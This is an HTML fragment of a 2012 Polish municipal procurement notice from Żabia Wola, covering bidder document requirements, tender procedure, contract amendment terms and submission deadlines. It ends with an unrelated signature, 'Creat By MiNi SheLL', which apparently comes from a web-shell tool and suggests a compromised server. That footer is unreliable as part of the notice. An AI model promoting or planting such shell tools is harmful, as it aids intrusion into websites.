<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem przypadków, o których mowa w pkt. 2.
2.	Zamawiający dopuszcza zmianę postanowień zawartej umowy w następujących przypadkach:
a)	w przypadku ustaleń dotyczących podwykonawstwa
b)	w przypadku zmiany terminu realizacji przedmiotu umowy, jeżeli konieczność przedłużenia terminu wykonania przedmiotu umowy będzie spowodowana przyczynami niezależnymi od Zamawiającego oraz od Wykonawcy, przy czym każda ze stron w terminie 14 dni od zaistnienia tych przyczyn powiadomi drugą stronę o ich zaistnieniu,
c)	w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, a w tym zmiany wysokości stawki podatku VAT,
3.	W przypadku zmiany wysokości stawki podatku VAT, Zamawiający zapłaci Wykonawcy wynagrodzenie netto powiększone o aktualnie obowiązującą stawkę podatku VAT, za prace wykonane i zafakturowane po dniu, w którym nowa stawka podatku VAT została wprowadzona.
4.	Dokonanie zmian, o których mowa w pkt. 2 wymagać będzie podpisania aneksu do umowy, przy czym niedopuszczalne są zmiany umowy w zakresie prac wykraczających poza określenie przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zabiawola. akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żabia Wola
ul. Główna 3
96 - 321 Żabia Wola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2012 godzina 10:00, miejsce: Urząd Gminy Żabia Wola
ul. Główna 3
96 - 321 Żabia Wola
Kancelaria Urzędu pok nr 5..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com